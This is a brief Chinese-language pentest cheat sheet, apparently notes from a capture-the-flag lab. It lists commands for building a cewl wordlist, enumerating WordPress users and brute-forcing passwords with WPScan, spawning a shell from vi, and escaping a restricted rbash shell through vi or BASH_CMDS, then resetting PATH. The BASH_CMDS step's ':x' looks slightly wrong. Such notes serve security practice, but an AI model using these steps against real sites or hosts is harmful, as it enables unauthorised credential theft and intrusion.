1. 字典生成工具cewl

cewl 网址(如https://www.baidu.com) -w 文件名(如dict.txt)

2. 扫描工具WPScan（只适用于WordPress）

  用户名枚举：  
    wpscan --url 网站地址 -e u
    -e表示枚举类型，u表示用户名。这两个配合使用是枚举用户名 
    密码爆破：
    wpscan --url 网站地址 -U 用户名字典 -P 密码字典

3. Linux的一些命令

编辑器命令：vi(或vim)
可配合提权操作，进去后，按Esc键可执行操作，输入一下命令
:set shell=/bin/bash（bash可以用sh代替）
:shell
可Getshell

环境变量查看（一般用于查看可执行命令）
echo $PATH
记住$PATH的值，比如输出/home/jerry/bin
echo path路径下的文件
这里配合上面命令得到的/home/jerry/bin，可以这样echo /home/jerry/bin/* 查看可执行的命令

添加环境变量
export PATH=$PATH:路径
常用的命令的环境变量路径有/usr/bin/和/bin/
我们可以这样添加
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

用户切换
su 用户名
之后输入该用户名密码即可 

4. rbash逃逸

rbash逃逸是Linux提权的其中之一

• vi/vim法

vi
在编辑器里执行命令，按Esc输入
:set shell=/bin/bash
回车，然后打开我们的shell
:shell
再设置一下环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

• BASH_CMDS法

利用它设置一个shell
BASH_CMDS[x]=/bin/bash(bash可以换为sh)
然后执行shell
:x
再设置一下环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/